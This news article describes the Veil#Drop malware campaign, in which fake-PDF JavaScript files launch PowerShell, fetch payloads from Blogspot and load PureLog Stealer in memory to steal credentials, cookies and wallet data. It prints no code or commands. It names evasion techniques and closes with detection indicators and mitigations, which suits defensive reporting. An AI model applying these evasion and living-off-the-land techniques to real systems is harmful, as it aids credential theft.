The campaign, tracked as Veil#Drop, begins with a JavaScript file disguised as a document, such as “transcript. pdf. js”. Once opened on a Windows system, the file runs through Windows Script Host and launches PowerShell with execution-policy bypasses enabled. The command then retrieves further payloads from attacker-controlled Blogspot pages, allowing the malicious traffic to blend with ordinary access to Google-owned infrastructure.
Security researchers said the framework loads PureLog Stealer through a chain of PowerShell download cradles, XOR-obfuscated code and. NET reflection, avoiding the need to write a conventional executable file to disk. The final payload is designed to harvest browser credentials, cookies, autofill data, browsing history, cryptocurrency wallet details and system information.
The use of Blogspot marks a notable escalation in the misuse of mainstream cloud and publishing platforms. By staging payloads on a familiar domain, attackers can reduce suspicion and weaken reputation-based blocking. The technique also complicates incident response because defenders may be reluctant to block an entire trusted service without disrupting legitimate users.
Veil#Drop relies heavily on native Windows tools. The initial JavaScript launcher spawns PowerShell, which retrieves and executes code in memory. Later stages reconstruct encrypted. NET assemblies at runtime and load them through reflection. The framework also includes fallback execution through Microsoft-signed utilities such as RegSvcs, InstallUtil, MSBuild, CSC, VBC and AspNet_Compiler, a tactic often described as “living off the land” because it uses legitimate binaries already present on the system.
The campaign’s social-engineering component remains central to its success. Attackers use double extensions and document-themed names to exploit the way many Windows systems hide known file extensions by default. A victim may see what appears to be a PDF, while the operating system executes a JavaScript file. The approach does not require a software vulnerability; it relies on trust, routine office behaviour and poor visibility into file types.
PureLog Stealer has become a persistent presence in credential-theft campaigns over the past year. Earlier operations used copyright complaint lures, invoice themes, purchase-order messages and malicious archives to push PureLogs variants at organisations and individuals. Other delivery chains have used encrypted payloads hidden inside image files, process hollowing and PowerShell-based loaders to evade static inspection.
The malware family is valued by criminals because stolen browser cookies and session tokens can bypass some multi-factor authentication protections. Once a session token is taken from an infected device, attackers may be able to access cloud email, business applications or cryptocurrency accounts without needing the victim’s password again. That risk is especially acute for finance teams, media organisations, government offices and small businesses that rely heavily on browser-based services.
The campaign also reflects a broader shift away from noisy malware droppers towards modular infection chains. Rather than placing a full malicious executable on the endpoint, attackers use small launchers, trusted services, encrypted blobs and memory-only execution. Each stage performs a narrow task, making detection harder and giving operators room to update infrastructure quickly if a domain or payload is blocked.
For defenders, the case highlights the limits of signature-based antivirus tools. Useful warning signs include unusual parent-child process chains such as wscript. exe launching powershell. exe, PowerShell using Invoke-RestMethod or Invoke-Expression to fetch remote content, encoded command execution, unexplained access to Blogspot URLs from endpoints, and. NET assemblies being loaded directly into memory. Monitoring trusted Microsoft utilities for abnormal execution is also becoming more important as attackers increasingly use them as fallback launch paths.
The practical response is less about blocking one platform and more about tightening execution controls. Organisations can reduce exposure by showing file extensions by default, restricting Windows Script Host where it is not required, applying PowerShell logging and constrained language mode, monitoring command-line activity, limiting outbound traffic from user endpoints, and using behavioural detection capable of flagging memory-only malware chains.
Follow Arabian Post
Select Arabian Post as your preferred source on Google and MSN News for trusted business news and Arab politics and updates.